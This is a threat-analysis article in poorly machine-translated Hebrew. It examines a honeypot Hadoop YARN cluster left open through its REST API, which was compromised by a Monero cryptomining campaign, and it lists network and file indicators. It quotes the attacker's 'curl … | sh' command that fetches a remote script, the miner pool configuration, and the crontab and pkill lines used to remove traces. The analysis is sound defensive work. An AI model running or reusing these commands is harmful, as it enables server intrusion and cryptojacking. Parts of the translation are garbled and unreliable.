הודעה לקוראים: מאמר זה מיועד למקצוענים בתחום אבטחת הסייבר.
אל תשחזר את הקישורים שפורסמו!
אתה לא מבין את המורכבות של נושאים מסוימים, אם לא כאשר אתה מתנגש, וזה בדרך כלל מאוחר מדי.
כדי לנסות לגרום לאנשים להבין מה המשמעות של "סייבר", אלה הלילות האחרונים אני שם על המחשב, למטרות חינוכיות, יצרתי סביבת HDFS1 לא מוגן כדי להבין מה יכול לקרות במקרה של התקנה ותצורה של סביבה לא כראוי "המוקשית" בדקתי, זה המקרה הנפוץ ביותר של מתקנים שבצעו אנשים טכניים שגוי או לא במיוחד קשוב.
מה ידווח הוא כיצד יש בעיית אבטחה במערכת ניהול המשאבים Hadoop Yarn (גישה לא מורשית בממשקי ה- API של REST2) שבו אתה יכול מרחוק לבצע קוד שרירותי. ברגע שנוצר התשתית, פשוט חיכיתי להתפתחות האירועים. אחרי שבוע מצאתי שהתשתית שנוצרה הותקפה ונפצעה.
לאחר מכן המשכתי לנתח את אחד ממקרי הפשרה ונותן פתרונות ייעוץ ואבטחה כדי להתגבר על בעיה זו.
המקרה הנבחר הוא מקרה של כריית di criptocurrency
ראשית, ננסה להבין משהו נוסף על התשתית המשמשת "חלת דבש3".
Hadoop היא תשתית מערכת מבוזרת שפותחה על ידי קרן אפאצ 'י, פלטפורמה אחידה לניהול המשאבים עבור מערכות hadoop, שתפקידו העיקרי הוא להשיג ניהול אחיד ותכנון משאבי אשכול (המשמשים בדרך כלל לניהול נתונים כגון מינים של מערכת קבצים מופץ). במסגרת חישוב MapReduce ניתן לבצע כתוכנית היישום. מעל היא מערכת YARN, המשאבים מנוהלים באמצעות YARN. במילים פשוטות, המשתמש יכול לשלוח תוכניות יישום ספציפיים ל YARN עבור ביצוע שעשוי לכלול ביצוע פקודות המערכת שלהם.
YARN מספק את ממשקי ה- API של REST, הפתוחים כברירת מחדל ביציאות 8088 ו- 8090, ומסיבה זו, כל משתמש, באמצעות ממשקי API, יכול לבצע את שליחת הפעילויות ופעולות אחרות במצב ישיר. אם הם מוגדרים באופן שגוי, ממשקי ה- API של REST ייפתחו ברשת הציבורית (לדוגמה, באינטרנט, אם תחליט להשתמש אשכול HDFS ב ענןויצרה) לאפשר גישה לא מורשית למערכת. בסופו של דבר אז, בתצורה הרעה מוודאת כי כל תוקף יכול להשתמש בתשתית לביצוע פקוד מרחוק, כדי לנהל פעולות כריית4 או פעילויות זדוניות אחרות על המערכת.
למה זה סוג של פעילות מאוד מתוחכם?
בגלל מערכות אבטחה בכושר בקושי בתוך צבירים או מערכות HDFS משמשים כדי לאפשר אימות Kerberos" מונע גישה אנונימית (upgradando גרסאות), או הבקרות להתקיים ניטור על אותם, זה בגלל מבנים אלה נולדים על מנת למקסם את הביצועים של מערכת המשמש לרוץ שאלה ed ניתוח שכבר יקרה בפני עצמה, מנקודת מבט חישובית.
עובר את הפעילות המרושעת שנמצאה
-
ניתוח פריצה
על המכונה משמש הפיתיון זה כבר מותקן מוגדר במצב ברירת המחדל Hadoop YARN, זה כשלעצמו גורם לבעיה של אבטחה גישה לא מורשית למערכת. L 'פולש משתמש ישירות בממשק ה- API של REST הפתוח ביציאת 8088, לאחר הסורק5 מזהה ספציפית א סט של דלתות פתוחות מראש מוגדר על ידי המבצע. בשלב זה,פולש יכול לשלוח פקודות ביצוע להוריד ולהפעיל סקריפט6 .sh בשרת (המצורפת 1 את כל הסקריפט נמצא, cr.sh). נוסף להורדה לאחר מכן הם יתחילו את התהליך של כריית.
התהליך כולו הוא פשוט יחסית מובנה היטב ואתה יכול לראות על ידי קריאת התסריט כי שום דבר לא נשאר סיכוי, כגון כמה בדיקות המבוצעות על שרת דדופ האוס.
הפקודה שנמצאה והוצאה להורג מעניינת:
exec / bin / bash -c "curl 185.222.210.59/cr.sh | sh & disown"
אני להתעכב על פקודה זו כדי להדגיש שני היבטים חשובים מאוד, כי היא כתובת ה- IP שממנו הסקריפט הוא הורדת וכמה פעילויות המשמשים להסוות פעילויות זדוניות7.
אם נמשיך בניתוח של הקוד בתוך התסריט cr.sh קל להבחין כי המחבר של אותו יש לשים לב במיוחד חיסול עקבות של פעילויות שבוצעו.8.
בנקודה זו, לסיכום, אנו יכולים לומר כי השלם תסריט הוא מפורט מאוד ונראה כי כל פונקציה מקוננת ונקראת, קבצים רבים מעורבים בתהליך כולו, כך אנו יכולים לדווח על הצעדים העיקריים על פי ההרכב הבא:
-
לנקות תהליכים הקשורים crontab, קבצים ופעילויות;
-
לשפוט ולהוריד את התוכנית כריית, בדוק את ערך MD5 בו זמנית, בנוסף לשרת המסומן, השתמש גם ב- https: // transfer.sh כדי לספק את להורדה גיבוי;
-
הוספת פעילות ביצוע של להורדה של תסריט ב crontab.
המדדים העיקריים שעלו מהניתוח הם:
-
185.222.210.59;
-
cr.sh
-
MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
-
http:// 185.222.210.59/re.php
-
xmrig_64 או xmrig_32
אנו נבדוק עם מחזור OSINF9 את האינדיקטורים לעיל.
-
185.222.210.59
אנו מנסים לאמת את מקורות כתובת ה- IP הזו. השדות העיקריים הבאים מוצגים באיור שלהלן:
בכמה פורומים10 המפיקים / שחרור פלטפורמה המבוססת חברות HDFS, ניתנות כתובת ה- IP ואת המחרוזת המדויקת, מצאה גם בתוך התסריט שלנו, מבקשות הסבר על. במקרים מסוימים הוא שואל אם זה תצורה סטנדרטית. כל תודות כמה מנהלי HDFS לבצע בדיקות יד ואפרודי, אין אוטומטיות.
על ידי הולך לבדוק את הפעולה של השרת, אתה מקבל את הדברים הבאים:
מידע בסיסי
|
OS |
דביאן |
|
פרוטוקולים |
80 / HTTP ו 22 / SSH |
-
80 / HTTP
|
קבל / |
|
|
שרת |
אפאצ 'י |
|
שורת מצב |
200 אישור |
|
כותרת הדף |
דביאן דף ברירת מחדל: זה עובד |
|
קבל / |
-
22 / SSH
|
לחיצת יד |
|
|
שרת |
OpenSSH 6.7p1 |
|
דֶגֶל |
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 |
מפתח מארח |
|
|
אַלגוֹרִיתְם |
ecdsa-sha2-nistp256 |
|
טביעות אצבע |
5a5c81f8dbc3e3d9fc57557691912a75b3be0d42ea5b30a2e7f1e584cffc5f40 |
|
אלגוריתם משא ומתן |
|
|
חילופי מפתח |
curve25519- sha256 @ libssh .org |
|
סימטרי |
aesXNXX-ctr | aes128-שק"ל |
|
מק |
hmac-sha2-256 | HMAC-sha2-256 |
זה גם אומת כי יציאת 111 פתוח קיים המתאים שירות portmap. לכן מן הצד שרת שקרים portmapper האזנה בנמל 111 (portmapper), מהצד לקוחות יש מספר תוכניות, עבור כל שירות RPC11, חייב תחילה ליצור קשר עם portmapper מרחוק אשר מספק להם את המידע הדרוש כדי ליצור קשר עם דמון מוסמכות. אתה יכול גם לבדוק פגיעות אפשריות בשירות, אבל הוא לא נושא של ניתוח המחקר ועסקים.
אז שרת מדובר "מחובר" וכנראה מתוחזק על ידי דלת 22 עם פרוטוקול ssh, המבטיח את החיבור המוצפן. מהשדה 22.ssh.v2.server_host_key.fingerprint_sha256, כלומר מ טביעת אצבעות של ssh של השרת, חיפושים מראים כי אין אחרים.
הוא גם מראה כיצד 80.http.get.headers.last_modified עשוי להצביע מועד ד ', מאי 16 2018 14: 58: 53 GMT
Il שרת שייך לזמינות הכתובת של חברת PRISM BUSINESS SERVICES LTD, אשר מהאתר הראשי http: // www. נראה כי prismbusiness.co.uk/about-us/ לא קשורה לפעילות הקשורה למגזר הטכני של ICT, אלא בתחומים אחרים. אם יש להם שרתים פעילים בהקשר ענןאולי, מוגדר ו / או אחר הצליחו למטרה זו כאשר הוא משרת, אינו מודע לשימוש הנוכחי שלהם.
הרשת כולה של זמינות שלהם מוצג:
אין פתרון DNS על ה- IP המנותח.
-
cr.sh
Lo תסריט cr.sh אשר נותח יש את הדברים הבאים MD5 48e79f8de26fa56d955a28c2de493132, עם זאת, אין ראיות של אינדקס באינטרנט.
-
MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
מדווח MD5, מתאים את הקבצים שהורדו תוך כדי ריצה את התסריט ואת המדווחות בטבלה שלהלן:
|
שם קובץ |
MD5 |
|
xmrig_64 |
c8c1f2da51fbd0aea60e11a81236c9dc |
|
xmrig_32 |
5110222de7330a371c83af67d46c4242 |
הקבצים המוצגים לעיל הם הליבה של ביצוע הוכחת עבודה (PoW) של אחד מטבע מבוזר ידוע, זה אכן Monero.
-
https:// transfer.sh/ixQBE/zzz
מעניין הוא השימוש transfer.sh, המתברר להיות אחד טקטיקות, טכניקות ונהלים (TTPs) של ההתנהגות של זה פולש, אשר מקבל גיבוי עבור ההורדה של הרצה כריית נתונים.
למעשה נמצא כי transfer.sh אינו אלא שיתוף קבצים מהיר וקל משורת הפקודה. קוד זה מכיל את השרת עם כל מה שאתה צריך כדי ליצור מופע משלך ", כולם זמינים להורדה בכתובת https: // github.com/dutchcoders/transfer.sh ובאתר https: // transfer.sh/ שם ישנם הסברים על השימוש עם מקרה השימוש כדי להיות מסוגל לשלב ולהגדיר אותו בקלות. התהליך של קוד שימוש חוזר הוא כיום בשימוש נרחב הן בהקשרים של פשע סייבר של הקשרים רחבים הרבה יותר ריגול באינטרנט o Cyber Intelligenge.
-
http:// 185.222.210.59/g.php
הדף היום, 02 יוני 2018, מגיב עם כתובת IP 95.142.40.81, ואילו בעת גילוי של תסריט כתובת ה- IP המוצגת הייתה 46.30.42.162. לשניהם יש את אותה ההתנהגות, שהוכנסה כמשתנה f1, לאחר ההמחאות שבוצעו עם getconf LONG_BIT, הורדת קבצי xmrig_64 או xmrig_32. ברור שזה מאפשר, אם נמצא זדוני כתובת ה- IP הראשונה, אבל לא את ה- IP של שליטה וניהול 185.222.210.59, כדי לעשות מיותר כמה פקדי אבטחה כגון רשימה שחורה da Firewall, קטגוריזציה לא פרטנית של Websense o אזהרה של SIEM לרשות SOC.
בוא נראה אם אנחנו יכולים להפיק משהו משני כתובות IP:
46.30.42.162
כתובת התוצאות בזמינות של Eurobyte VPS, ואת הכתובת נושאת בכיתה של כתובות 24 בר בזמינות של אירוח זה, אשר ממוצא רוסי.
גם זה שרת, וכתוצאה מכך את יציאות 22 ו 80 פתוח, עם מערכת ההפעלה דביאן.
להלן פירוט הפרטים:
מידע בסיסי
|
OS |
דביאן |
|
רשת |
MCHOST - AS (RU) |
|
ניתוב |
46.30.42.0 / 24 באמצעות AS7018, ASXNX, ASXNX, AS3356 |
|
פרוטוקולים |
80 / HTTP ו 22 / SSH |
-
80 / HTTP
|
קבל / |
|
|
שרת |
אפאצ 'י |
|
שורת מצב |
200 אישור |
|
כותרת הדף |
דביאן דף ברירת מחדל: זה עובד |
|
קבל / |
-
22 / SSH
|
לחיצת יד |
|
|
שרת |
OpenSSH 6.7p1 |
|
דֶגֶל |
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 |
מפתח מארח |
|
|
אַלגוֹרִיתְם |
ecdsa-sha2-nistp256 |
|
טביעות אצבע |
3e88599d935de492c07f93e313201aa340b7ff0a5f66a330a0c5ab660cf95fad |
|
אלגוריתם משא ומתן |
|
|
חילופי מפתח |
curve25519- sha256 @ libssh .org |
|
סימטרי |
aesXNXX-ctr | aes128-שק"ל |
|
מק |
hmac-sha2-256 | HMAC-sha2-256 |
יצוין כי חיפוש המבוסס על טביעת אצבע של המארח מפתח, מראה כי ישנם שרתי 41 אחרים עם אותה חתימה. אלה שרתי 41, אפילו את כתובת ה- IP החדשה 95.142.40.81 הוא בזמינות של הפורץ.
עם נתונים אלה אנו יכולים להניח להניח כי מצאנו אחד בריכה תשתית ברמה הראשונה של יחיד זה פולש או קבוצה של פשע Cyber.
הפניה וכל מידע שימושי עבור הפעילויות הבאות הם דיווחו:
|
95.142.40.74 (vz232259.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
185.154.53.249 (vz232259.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.40.89 (vz229526.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.40.190 (vz232259.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.40.189 (vz232259.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
46.30.47.115 (vz227413.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.39.241 (shimshim.info) |
AS (48282) רוסיה location.country: רוסיה מסד נתונים MySQL |
|
95.142.40.188 (vz232259.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
46.30.41.207 (vz230806.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
46.30.41.182 (vz230501.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.39.251 (vz232259.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
185.154.53.67 (vz232259.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
185.154.53.65 (profshinservice.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
46.30.45.91 (vz220153.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
185.154.53.46 (server.badstudio.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
46.30.41.80 (track.dev) |
AS (48282) רוסיה location.country: רוסיה |
|
46.30.45.152 (vz230274.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
185.154.53.72 (vz231895.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
185.154.53.137 (vz224405.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.39.151 (donotopen.ru) |
AS (48282) רוסיה location.country: רוסיה מסד נתונים MySQL |
|
185.154.52.117 (vz230686.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
46.30.47.157 (vz228859.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.40.83 (vz228857.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.40.86 (kolos1952.ru) |
AS (48282) רוסיה location.country: רוסיה מסד נתונים MySQL |
|
95.142.40.81 (vz228855.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
46.30.42.162 (server.com) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.40.82 (vz228856.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
46.30.43.128 (vz228757.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
185.154.52.236 (support.ru) |
AS (48282) רוסיה location.country: רוסיה מסד נתונים MySQL |
|
95.142.39.109 (vz228627.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.40.44 (vz229990.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.39.164 (vz232259.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
46.30.45.30 (shop.engine) |
AS (48282) רוסיה location.country: רוסיה |
|
95.142.39.172 (hosted-by.wikhost.com) |
AS (48282) רוסיה location.country: רוסיה מסד נתונים MySQL |
|
185.154.52.161 (piar60.ru) |
AS (48282) רוסיה location.country: רוסיה מסד נתונים MySQL |
|
95.142.40.87 (regiister.ru) |
AS (48282) רוסיה location.country: רוסיה מסד נתונים MySQL |
|
95.142.40.88 (buled.ru) |
AS (48282) רוסיה location.country: רוסיה מסד נתונים MySQL |
|
185.154.53.190 (vz228963.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה מסד נתונים MySQL |
|
46.30.41.51 (vz225213.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
185.154.53.108 (vz224405.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
|
185.154.52.181 (vz224405.eurodir.ru) |
AS (48282) רוסיה location.country: רוסיה |
אלה במקום מטה על ניתוח של ה- IP 41 לעיל:
כל הכתובות שנמצאו, מתייחסות ל AS MCHOST-AS, RU:
1-th רחוב Frezernaiy, 2 / 1 XENUMX שבץ
109202 מוסקבה
הפדרציה הרוסית
טלפון: + 7 495 6738456
פקס: + 7 495 6738456
e-mail: info (at) mchost (dot) ru
תחומי שירות: RU
-
http:// 185.222.210.59/w.conf
היום:
{
"algo": "cryptonight",
"רקע": נכון,
"צבעים": false,
"נסיונות חוזרים": 5,
"נסה שוב להשהות": 5,
"לתרום ברמה": 1,
"syslog": false,
"log-file": null,
"print time": 60,
"av": 0,
"בטוח": שקר,
"max-cpu-use": 95,
"עדיפות מעבד": 4,
"thread": null,
"בריכות": [
{
"url": "stratum + tcp: // 46.30.43.159: 80",
"user": "h", "
"pass": "h",
"קפדני": נכון,
"nicehash": שקר,
"variant": -1
}
],
"api": {
"port": 0,
"access-token": null,
"עובד מזהה": null
}
}
בעת גילוי של תסריט:
{
"algo": "cryptonight",
"רקע": נכון,
"צבעים": false,
"נסיונות חוזרים": 5,
"נסה שוב להשהות": 5,
"לתרום ברמה": 1,
"syslog": false,
"log-file": null,
"print time": 60,
"av": 0,
"בטוח": שקר,
"max-cpu-use": 95,
"עדיפות מעבד": 4,
"thread": null,
"בריכות": [
{
"url": "stratum + tcp: // 179.60.146.10: 5556",
"user": "h", "
"pass": "h",
"קפדני": נכון,
"nicehash": שקר,
"variant": -1
},
{
"url": "stratum + tcp: // 46.30.43.159: 80",
"user": "h", "
"pass": "h",
"קפדני": נכון,
"nicehash": שקר,
"variant": -1
}
],
"api": {
"port": 0,
"access-token": null,
"עובד מזהה": null
}
}
חשוב להדגיש כיצד קובץ ה- Conf מגדיר שני אינדיקטורים חשובים בשלב הניתוח (ניתן גם להגדיר שלושה):
-
שכבה + tcp: // 46.30.43.159: 80 (במשותף בתאריכים שונים);
-
שכבה + tcp: // 179.60.146.10: 5556 (רק בממצא הראשון);
-
"algo": "cryptonight";
בואו ננתח את ה- IP הראשון במשותף 46.30.43.159. זה כתובת ה- IP, בזמינות של Eurobyte VPS, רוסית, יש כמו PTR vz230703.eurodir.ru והוא חלק 46.30.43.0 נטו / 24. PTR של כתובות IP של נטו, המצורפת 1 מראה את הכיתה כולה, יש להם משהו מיוחד. אני לדווח בטבלה מתחת PTR עם דמיון ללא שדה A, אני 41:
|
IP |
PTR |
|
46.30.43.13 |
vz94180.eurodir.ru |
|
46.30.43.17 |
vz203045.eurodir.ru |
|
46.30.43.21 |
vz206109.eurodir.ru |
|
46.30.43.23 |
vz216100.eurodir.ru |
|
46.30.43.24 |
vz174272.eurodir.ru |
|
46.30.43.30 |
vz35015.eurodir.ru |
|
46.30.43.57 |
vz78210.eurodir.ru |
|
46.30.43.58 |
vz229754.eurodir.ru |
|
46.30.43.61 |
vz35015.eurodir.ru |
|
46.30.43.64 |
vz38207.eurodir.ru |
|
46.30.43.66 |
vz86195.eurodir.ru |
|
46.30.43.70 |
vz173527.eurodir.ru |
|
46.30.43.77 |
vz174931.eurodir.ru |
|
46.30.43.79 |
vz195563.eurodir.ru |
|
46.30.43.82 |
vz197086.eurodir.ru |
|
46.30.43.90 |
vz120816.eurodir.ru |
|
46.30.43.93 |
vz173527.eurodir.ru |
|
46.30.43.98 |
vz94065.eurodir.ru |
|
46.30.43.101 |
vz216360.eurodir.ru |
|
46.30.43.102 |
vz195005.eurodir.ru |
|
46.30.43.123 |
vz212299.eurodir.ru |
|
46.30.43.128 |
vz228757.eurodir.ru |
|
46.30.43.130 |
vz168899.eurodir.ru |
|
46.30.43.156 |
vz195735.eurodir.ru |
|
46.30.43.159 |
vz230703.eurodir.ru |
|
46.30.43.161 |
vz171964.eurodir.ru |
|
46.30.43.166 |
vz123353.eurodir.ru |
|
46.30.43.170 |
vz224733.eurodir.ru |
|
46.30.43.172 |
vz226924.eurodir.ru |
|
46.30.43.184 |
vz171966.eurodir.ru |
|
46.30.43.186 |
vz162078.eurodir.ru |
|
46.30.43.214 |
vz207073.eurodir.ru |
|
46.30.43.219 |
vz110518.eurodir.ru |
|
46.30.43.224 |
vz98980.eurodir.ru |
|
46.30.43.226 |
vz100250.eurodir.ru |
|
46.30.43.229 |
vz110562.eurodir.ru |
|
46.30.43.232 |
vz228251.eurodir.ru |
|
46.30.43.237 |
vz162078.eurodir.ru |
|
46.30.43.244 |
vz207073.eurodir.ru |
|
46.30.43.245 |
vz174272.eurodir.ru |
|
46.30.43.246 |
vz157495.eurodir.ru |
גם במקרה זה, המנהל לא יכול להיות מודע לכך שחלק משרתים אלה תחת זמינותו, משמשים למטרות של צד שלישי, אולם יש לנתח אחד אחד, כדי למצוא קווי דמיון נוספים.
ניתוח 179.60.146.10במקום זאת יש לנו את הדברים הבאים:
ECDSA key fingerprint is SHA256:62Jyi3X1dEJRIH85kJ0Ee20aW+PEK5g976Xk3yGKVHQ
יציאה 22, 111, 5555 תוצאה לפתוח וגם זה שרת משתמש ב- OpenSSHVersion: 6.7p1 דביאן 5 + deb8u3
לרוע המזל אין ראיות אחרות.
קריפטונייט במקום זאת, זה אינדיקטור חזק של מה שאתה רוצה לעשות, ברגע שאתה מכה את יעד. באופן ספציפי, המטרה היא לערער את בלוקים של מטבע מבוזר של מונרו, להיכנס יעד בתוך בריכה זמינה dell'intruder. הבחירה אינה אקראית. הפרוטוקול קריפטונייט זה כבר למד להיות מאומץ על ידי כורה כי אין את הזמינות של ASIC או אשכול של כרטיסי גרפיקה יקר מאוד, אבל אתה יכול להשתמש במעבדים הקלאסיים של מחשב, מחשב נייד או MiniPC.
ואכן, CryptoNight משמש עבור כריית של מטבעות אלה המאופיינים בפרוטוקול CryptoNote. זה פונקציה מחויב בזיכרון (זיכרון קשיח זיכרון), במקרה זה את זיכרון המטמון ברמה השלישית של המעבדים כפי שהוא מתמקד חביון. אילוץ זה הוטל על מנת להפוך את CryptoNight לבלתי יעיל במערכות כגון GPU ו- FPGA, שאינו מצויד בזיכרון המטמון ולכן נחסך לשימוש באלגוריתם.
הממדים של פנקס ' של CryptoNight הם בערך 2 MB של זיכרון עבור כל מופע בשל הסיבות הבאות:
-
זה יכול להיות הכלול L3 (לכל הליבה) מטמון של מעבדים מודרניים;
-
זיכרון פנימי של מגה è אונה גודל בלתי מקובל עבור צינור ASIC המסורתית;
-
GPU יכול לרוץ מאות חוט אבל יש להם חביון הרבה יותר גרוע מאשר מטמון L3 של המעבדים המודרניים;
-
הרחבה משמעותית של פנקס ' יחייב עלייה באינטראקציות. אם הצומת בילה כמות ניכרת של זמן על חשיש של בלוק, זה יכול בקלות להיות מוצף במנגנון שִׁיטָפוֹן של בלוקים כוזבים גרימת DDoS.
שדרג
רק בימים אלה, היה שינוי של תסריט cr.sh, של קבצי התצורה ואת הרצה.
ההורדה של הרציפים לתאריך כריית זה מתקבל כתובת ה- 95.142.40.83 IP, אשר הובילה לזיהוי דרך טביעת אצבעות של מפתח ssh, כתובות IP נוספות הזמינותפולש.
בטבלה שלהלן מראה את הפרטים של 20 65 של כתובות IP, שכן אין כל אפשרות להשיג את כולם בבלוק (מחסור של זמן חשבון שילם לא זמין) עם אותם מפתחות ssh ואת אותן תצורות.
|
95.142.39.233 vz231616.eurodir.ru |
McHost.Ru נוסף על 2018-06-03 03: 44: 26 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
46.30.43.128 vz228757.eurodir.ru |
EuroByte LLC נוסף על 2018-06-03 03: 35: 03 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
46.30.47.107 vz227413.eurodir.ru |
EuroByte LLC נוסף על 2018-06-03 03: 15: 02 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
46.30.41.182 vz230501.eurodir.ru |
EuroByte LLC נוסף על 2018-06-02 21: 01: 28 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
46.30.47.21 vz227411.eurodir.ru |
לינוקס 3.x EuroByte LLC נוסף על 2018-06-02 16: 48: 39 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
95.142.40.188 vz232259.eurodir.ru |
McHost.Ru נוסף על 2018-06-02 12: 58: 55 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
46.30.45.30 shop.engine |
EuroByte LLC נוסף על 2018-06-02 09: 45: 16 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
95.142.40.81 vz228855.eurodir.ru |
McHost.Ru נוסף על 2018-06-02 07: 11: 32 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
185.154.53.137 vz224405.eurodir.ru |
EuroByte LLC נוסף על 2018-06-02 07: 04: 48 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
46.30.47.82 vz227413.eurodir.ru |
EuroByte LLC נוסף על 2018-06-02 04: 55: 14 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
185.154.53.67 vz232259.eurodir.ru |
EuroByte LLC נוסף על 2018-06-02 03: 45: 39 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
95.142.40.87 regiister.ru |
McHost.Ru נוסף על 2018-06-01 22: 04: 23 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
46.30.47.66 vz227407.eurodir.ru |
EuroByte LLC נוסף על 2018-06-01 18: 17: 26 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
XTUMX תמיכה |
EuroByte LLC נוסף על 2018-06-01 11: 27: 17 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
46.30.47.35 vz227411.eurodir.ru |
לינוקס 3.x EuroByte LLC נוסף על 2018-06-01 11: 07: 16 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
185.154.53.46 server.badstudio.ru |
EuroByte LLC נוסף על 2018-06-01 07: 22: 23 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
95.142.40.89 vz229526.eurodir.ru |
McHost.Ru נוסף על 2018-05-31 14: 07: 45 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
46.30.42.162 server.com |
EuroByte LLC נוסף על 2018-05-31 12: 56: 26 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
95.142.39.102 vz222177.eurodir.ru |
McHost.Ru נוסף על 2018-05-31 10: 05: 30 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
|
95.142.40.86 kolos1952.ru |
McHost.Ru נוסף על 2018-05-31 09: 42: 31 GMT הפדרציה הרוסית SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 סוג מפתח: ssh-rsa |
הנה כמה גרפים מפורטים:
בנוסף, הקבצים להורדה ניתנים באופן הבא:
|
שם קובץ |
MD5 |
|
xm64 |
183664ceb9c4d7179d5345249f1ee0c4 |
|
xm32 |
b00f4bbd82d2f5ec7c8152625684f853 |
בנוסף לאמור לעיל, ב תסריט, הפקודות הבאות נמצאות:
pkill-f logo4.jpg
pkill-f logo0.jpg
pkill-f logo9.jpg
pkill-f jvs
pkill-f javs
pkill-f 192.99.142.248
rm -rf / tmp / pscd *
rm -rf / var / tmp / pscd *
crontab -l sed '/ 192.99.142.232 / d' | crontab -
crontab -l sed '/ 192.99.142.226 / d' | crontab -
crontab -l sed '/ 192.99.142.248 / d' | crontab -
crontab -l sed '/ logo4 / d' | crontab -
crontab -l sed '/ logo9 / d' | crontab -
crontab -l sed '/ logo0 / d' | crontab -
השימוש של הפקודה sed, אשר אינו נפוץ התכנות, ניכרת מיד, ולכן זה גם יכול בסופו של דבר בין TTPs המשמש את השחקן העוין.
סד הוא אחד זרם עורך, המשמש לביצוע טרנספורמציות טקסט על זרם קלט (קובץ או קלט מתוך צינור); זה את היכולת של Sed לסנן את הטקסט בצינור שמבדיל אותו בצורה מסוימת מסוגים אחרים של העורכים.
בהקשר זה הוא משמש לחסל כל זכר מפעילויות cron. ככל הנראה, יש פעילות חדירה לא ידוע לניתוח, כפי שהם נגזרים פעילויות העבר כי אז השתנה כדי להשיג את מה שהיה צפוי.
ביצוע ניתוח של כתובות IP 192.99.142.232, 192.99.142.226, 192.99.142.248, אנו מקבלים כי החברה (ISP) של הפניה הוא OVH אירוח עם מיקום בקנדה.
